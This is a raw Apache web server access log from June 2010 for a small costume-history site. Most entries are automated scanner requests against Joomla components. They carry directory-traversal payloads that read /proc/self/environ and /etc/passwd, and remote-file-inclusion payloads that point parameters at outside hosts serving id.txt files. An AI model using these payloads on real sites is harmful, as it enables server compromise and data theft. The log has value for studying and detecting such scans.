201.116.197.150 - - [29/Jun/2010:09:01:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
213.171.37.206 - - [29/Jun/2010:09:03:54 -0500] "GET /logs/access_log.1276473600//?option=com_extplorer&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:09:03:54 -0500] "GET /logs//?option=com_extplorer&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:09:03:54 -0500] "GET //?option=com_extplorer&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
186.28.232.13 - - [29/Jun/2010:09:05:41 -0500] "GET /logs/access_log.1275264000//?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
186.28.232.13 - - [29/Jun/2010:09:05:41 -0500] "GET //?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
186.28.232.13 - - [29/Jun/2010:09:05:41 -0500] "GET /logs//?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 200 11365 "-""libwww-perl/5.805"
83.169.4.193 - - [29/Jun/2010:09:08:38 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:09:08:38 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:09:08:38 -0500] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.808"
91.82.250.167 - - [29/Jun/2010:09:10:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:09:10:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:09:10:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:09:10:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:09:10:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
83.169.4.193 - - [29/Jun/2010:09:10:49 -0500] "GET /logs/access_log.1277164800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.808"
91.142.214.148 - - [29/Jun/2010:09:11:33 -0500] "GET /logs/access_log.1275264000//?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.142.214.148 - - [29/Jun/2010:09:11:33 -0500] "GET //?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.142.214.148 - - [29/Jun/2010:09:11:33 -0500] "GET /logs//?option=com_rssfactory&Itemid=5&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 200 11365 "-""libwww-perl/5.805"
67.195.112.180 - - [29/Jun/2010:09:11:45 -0500] "GET /logs/access_log.1221782400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.30.129.57 - - [29/Jun/2010:09:12:16 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.30.129.57 - - [29/Jun/2010:09:12:16 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.195.112.180 - - [29/Jun/2010:09:13:20 -0500] "GET /logs/access_log.1198886400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
117.53.96.161 - - [29/Jun/2010:09:14:46 -0500] "HEAD / HTTP/1.0" 200 0 "http://tomdolan.pconline.com""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
187.45.193.143 - - [29/Jun/2010:09:16:54 -0500] "GET /logs/access_log.1276300800/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.143 - - [29/Jun/2010:09:16:55 -0500] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.143 - - [29/Jun/2010:09:16:55 -0500] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:20:07 -0500] "GET /includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:20:07 -0500] "GET /includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
202.53.7.139 - - [29/Jun/2010:09:20:55 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
195.208.218.14 - - [29/Jun/2010:09:21:25 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9D%D0%B0%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B9_%D0%BA%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
195.208.218.14 - - [29/Jun/2010:09:21:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
195.208.218.14 - - [29/Jun/2010:09:22:32 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
195.208.218.14 - - [29/Jun/2010:09:22:32 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
195.208.218.14 - - [29/Jun/2010:09:22:32 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
195.208.218.14 - - [29/Jun/2010:09:22:33 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10"
67.30.129.57 - - [29/Jun/2010:09:24:11 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.30.129.57 - - [29/Jun/2010:09:24:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.30.129.57 - - [29/Jun/2010:09:24:15 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.811"
91.82.250.167 - - [29/Jun/2010:09:24:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:09:24:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
67.30.129.57 - - [29/Jun/2010:09:24:20 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.30.129.57 - - [29/Jun/2010:09:24:21 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.30.129.57 - - [29/Jun/2010:09:24:21 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.811"
187.45.193.159 - - [29/Jun/2010:09:25:27 -0500] "GET /logs/access_log.1276300800/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.159 - - [29/Jun/2010:09:25:27 -0500] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.159 - - [29/Jun/2010:09:25:28 -0500] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.169.4.193 - - [29/Jun/2010:09:26:04 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
88.191.104.172 - - [29/Jun/2010:09:26:34 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:34 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:34 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""dex Bot Search"
88.191.104.172 - - [29/Jun/2010:09:26:35 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""dex Bot Search"
195.190.166.35 - - [29/Jun/2010:09:32:27 -0500] "GET /logs/access_log.1275868800//?option=com_joomlaxplorer&Itemid=10&catid=&mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
195.190.166.35 - - [29/Jun/2010:09:32:27 -0500] "GET //?option=com_joomlaxplorer&Itemid=10&catid=&mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
195.190.166.35 - - [29/Jun/2010:09:32:27 -0500] "GET /logs//?option=com_joomlaxplorer&Itemid=10&catid=&mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.65"
89.31.116.11 - - [29/Jun/2010:09:33:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
89.31.116.11 - - [29/Jun/2010:09:33:03 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
89.31.116.11 - - [29/Jun/2010:09:33:03 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
89.31.116.11 - - [29/Jun/2010:09:33:24 -0500] "GET /logs/access_log.1277424000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
89.31.116.11 - - [29/Jun/2010:09:33:47 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
79.170.45.162 - - [29/Jun/2010:09:34:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:34:13 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:34:13 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:34:29 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:34:34 -0500] "GET /logs/access_log.1277424000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:35:01 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
95.156.233.139 - - [29/Jun/2010:09:35:32 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:32 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
79.170.45.162 - - [29/Jun/2010:09:35:37 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:35:37 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [29/Jun/2010:09:35:37 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
95.156.233.139 - - [29/Jun/2010:09:35:48 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:49 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:52 -0500] "GET /logs//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:53 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:54 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:35:54 -0500] "GET /logs//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:36:07 -0500] "GET /logs/access_log.1277424000//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [29/Jun/2010:09:36:09 -0500] "GET /logs/access_log.1277424000//index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
67.195.112.180 - - [29/Jun/2010:09:37:03 -0500] "GET /logs/access_log.1194566400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [29/Jun/2010:09:37:13 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:15 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:16 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:18 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:20 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:22 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:24 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:26 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:29 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:30 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:33 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:35 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:38 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:55 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:09:37:58 -0500] "GET /logs/access_log.1222041600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
201.20.37.59 - - [29/Jun/2010:09:37:58 -0500] "GET /logs/access_log.1276819200/includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:37:58 -0500] "GET /includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:37:59 -0500] "GET /logs/includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
208.115.111.248 - - [29/Jun/2010:09:38:00 -0500] "GET /logs/access_log.1222214400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
201.20.37.59 - - [29/Jun/2010:09:38:01 -0500] "GET /logs/access_log.1276819200/includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:38:02 -0500] "GET /includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.20.37.59 - - [29/Jun/2010:09:38:02 -0500] "GET /logs/includes/header.php?systempath=http://plautdietsch.net/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
208.115.111.248 - - [29/Jun/2010:09:38:02 -0500] "GET /logs/access_log.1222300800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
83.216.172.149 - - [29/Jun/2010:09:38:29 -0500] "GET /logs/access_log.1277164800/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
